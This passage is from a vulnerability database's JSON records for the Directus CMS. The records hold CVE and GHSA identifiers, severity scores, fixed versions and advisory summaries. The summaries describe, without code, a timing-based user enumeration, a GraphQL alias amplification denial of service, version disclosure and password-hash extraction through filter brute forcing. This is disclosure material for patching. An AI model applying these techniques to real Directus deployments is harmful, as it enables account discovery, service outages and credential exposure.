6-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36031"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36031","reference_id":"CVE-2022-36031","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36031"},{"reference_url":"https://github.com/advisories/GHSA-77qm-wvqq-fg79","reference_id":"GHSA-77qm-wvqq-fg79","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-77qm-wvqq-fg79"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79","reference_id":"GHSA-77qm-wvqq-fg79","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:00Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/78985?format=json","purl":"pkg:npm/directus@9.15.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-et4m-8y15-9fb9"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-szny-2sbf-v7de"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-v4vz-smcx-gygb"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.15.0"}],"aliases":["CVE-2022-36031","GHSA-77qm-wvqq-fg79"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9gba-zszk-p3h6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/22527?format=json","vulnerability_id":"VCID-anfb-6kfn-a7h7","summary":"Directus Vulnerable to User Enumeration via Password Reset Timing Attack\nA timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid reset_url parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26185","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02691","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26185"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a"},{"reference_url":"https://github.com/directus/directus/pull/26485","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/pull/26485"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.14.1","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.14.1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26185","reference_id":"CVE-2026-26185","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26185"},{"reference_url":"https://github.com/advisories/GHSA-jr94-gj3h-c8rf","reference_id":"GHSA-jr94-gj3h-c8rf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jr94-gj3h-c8rf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf","reference_id":"GHSA-jr94-gj3h-c8rf","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72811?format=json","purl":"pkg:npm/directus@11.14.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.1"}],"aliases":["CVE-2026-26185","GHSA-jr94-gj3h-c8rf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-anfb-6kfn-a7h7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/346608?format=json","vulnerability_id":"VCID-axx3-a6te-d3cw","summary":"Directus: Unauthenticated Denial of Service via GraphQL Alias Amplification of Expensive Health Check Resolver\n## Summary\n\nThe GraphQL specification permits a single query to repeat the same field multiple times using aliases, with each alias resolved independently by default. Directus did not deduplicate resolver invocations within a single request, meaning each alias triggered a full, independent execution of the underlying resolver.\n\nThe health check resolver ran all backend checks (database connectivity, cache, storage writes, and SMTP verification) on every invocation. Combined with unauthenticated access to the system GraphQL endpoint, this allowed an attacker to amplify resource consumption significantly from a single HTTP request, exhausting the database connection pool, storage I/O, and SMTP connections.\n\n## Fix\n\nA request-scoped resolver deduplication mechanism was introduced and applied broadly across all GraphQL read resolvers, both system and items endpoints. When multiple aliases in a single request invoke the same resolver with identical arguments, only the first call executes; all subsequent aliases share its result. This eliminates the amplification factor regardless of how many aliases an attacker includes in a query.\n\n## Impact\n\n- **Service degradation or outage:** Database connection pool exhaustion prevents all Directus operations for all users\n- **Storage I/O saturation:** Concurrent file writes can overwhelm disk I/O\n- **SMTP resource exhaustion:** Concurrent SMTP verification calls may overwhelm the mail server\n- **No authentication required:** Any network-accessible attacker can trigger this condition\n- **Single-request impact:** A single request is sufficient to cause significant resource consumption\n\n## Credit\n\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh"},{"reference_url":"https://github.com/advisories/GHSA-6q22-g298-grjh","reference_id":"GHSA-6q22-g298-grjh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6q22-g298-grjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["GHSA-6q22-g298-grjh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-axx3-a6te-d3cw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/306029?format=json","vulnerability_id":"VCID-bh2g-b9dd-d3d9","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53886","reference_id":"","reference_type":"","scores":[{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54434","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53886"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/859f664f56fb50401c407b095889cea38ff580e5","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/859f664f56fb50401c407b095889cea38ff580e5"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53886","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53886"},{"reference_url":"https://github.com/directus/directus/pull/25354","reference_id":"25354","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/pull/25354"},{"reference_url":"https://github.com/advisories/GHSA-f24x-rm6g-3w5v","reference_id":"GHSA-f24x-rm6g-3w5v","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f24x-rm6g-3w5v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/195594?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53886","GHSA-f24x-rm6g-3w5v"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bh2g-b9dd-d3d9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/256072?format=json","vulnerability_id":"VCID-eb8p-vqjt-yfb8","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34708","reference_id":"","reference_type":"","scores":[{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55666","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34708"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/"}],"url":"https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34708","reference_id":"CVE-2024-34708","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34708"},{"reference_url":"https://github.com/advisories/GHSA-p8v3-m643-4xqx","reference_id":"GHSA-p8v3-m643-4xqx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p8v3-m643-4xqx"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx","reference_id":"GHSA-p8v3-m643-4xqx","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/81014?format=json","purl":"pkg:npm/directus@10.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.0"}],"aliases":["CVE-2024-34708","GHSA-p8v3-m643-4xqx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eb8p-vqjt-yfb8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19598?format=json","vulnerability_id":"VCID-ejme-tqn4-byhk","summary":"Directus version number disclosure\n### Impact\n\nCurrently the exact Directus version number is being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version.\n\n### Patches\n\nThe problem has been resolved in versions 10.8.3 and newer\n\n### Workarounds\n\nNone","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27296","reference_id":"","reference_type":"","scores":[{"value":"0.00437","scoring_system":"epss","scoring_elements":"0.63372","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27296"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/"}],"url":"https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27296","reference_id":"CVE-2024-27296","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27296"},{"reference_url":"https://github.com/advisories/GHSA-5mhg-wv8w-p59j","reference_id":"GHSA-5mhg-wv8w-p59j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5mhg-wv8w-p59j"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j","reference_id":"GHSA-5mhg-wv8w-p59j","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/68026?format=json","purl":"pkg:npm/directus@10.8.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3"}],"aliases":["CVE-2024-27296","GHSA-5mhg-wv8w-p59j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ejme-tqn4-byhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/17040?format=json","vulnerability_id":"VCID-et4m-8y15-9fb9","summary":"Exposure of Sensitive Information to an Unauthorized Actor\nDirectus is a real-time API and App dashboard for managing SQL database content. In versions prior to 9.16.0 users with read access to the `password` field in `directus_users` can extract the argon2 password hashes by brute forcing the export functionality combined with a `_starts_with` filter. This allows the user to enumerate the password hashes. Accounts cannot be taken over unless the hashes can be reversed which is unlikely with current hardware. This problem has been patched by preventing any hashed/concealed field to be filtered against with the `_starts_with` or other string operator in version 9.16.0. Users are advised to upgrade. Users unable to upgrade may mitigate this issue by ensuring that no user has `read` access to the `password` field in 